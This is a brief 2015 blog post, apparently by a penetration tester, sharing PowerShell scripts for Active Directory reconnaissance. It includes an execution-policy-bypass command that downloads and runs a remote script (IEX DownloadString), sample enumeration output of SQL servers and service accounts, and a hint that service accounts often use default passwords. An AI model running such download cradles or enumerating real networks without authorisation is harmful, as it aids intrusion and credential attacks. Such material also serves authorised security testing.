Monday, March 9, 2015

PowerShell-AD-Recon by PyroTek3

Found a couple of fun PowerShell enumeration scripts here:

https://github.com/PyroTek3/PowerShell-AD-Recon



C:\temp>powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"

Processing XX (user and computer) accounts with MS SQL SPNs discovered in AD Forest DC=UNLUCKY,DC=NET

Domain           : UNLUCKY.NET
ServerName       : unlucklaptop.unlucky.net
Port             :
Instance         : SQLEXPRESS
ServiceAccountDN :
OperatingSystem  : {Windows 8.1 Enterprise}
OSServicePack    :
LastBootup       : 1/10/2015 11:47:55 AM
OSVersion        : {6.3 (9600)}
Description      :


Domain           : UNLUCKY.NET
ServerName       : unluckserver.unlucky.net
Port               : 1433
Instance           :
ServiceAccountDN   : {CN=Svc-blahblah,OU=Service Accounts,,DC=unlucky,DC=net}
OperatingSystem    :
OSServicePack      :
LastBootup         : 12/31/1600 4:00:00 PM
OSVersion          :
Description        :
SrvAcctUserID      : svc-userid
SrvAcctDescription : ---SNIP--- 


The rest of the repo has fun stuff too

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers
-Find Exchange Servers

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
-Get a list of all the service accounts. Those are always good candidates for company defaults

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo
-Forest Info

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices
-searches for a list of attributes across the forest. This will take a LONG time on a big domain/forest.

default list of stuff:
        [String[]] $StandardSPNServiceFilter = ("ADAM","AGPM","bo","CESREMOTE","Dfs","DNS","Exchange","FIMService","ftp","http","IMAP","ipp","iSCSITarget","kadmin","ldap","MS","sql","nfs","secshd","sip","SMTP","SoftGrid","TERMSRV","Virtual","vmrc","vnc","vpn","vssrvc","WSMAN","xmpp"),


No comments:

Post a Comment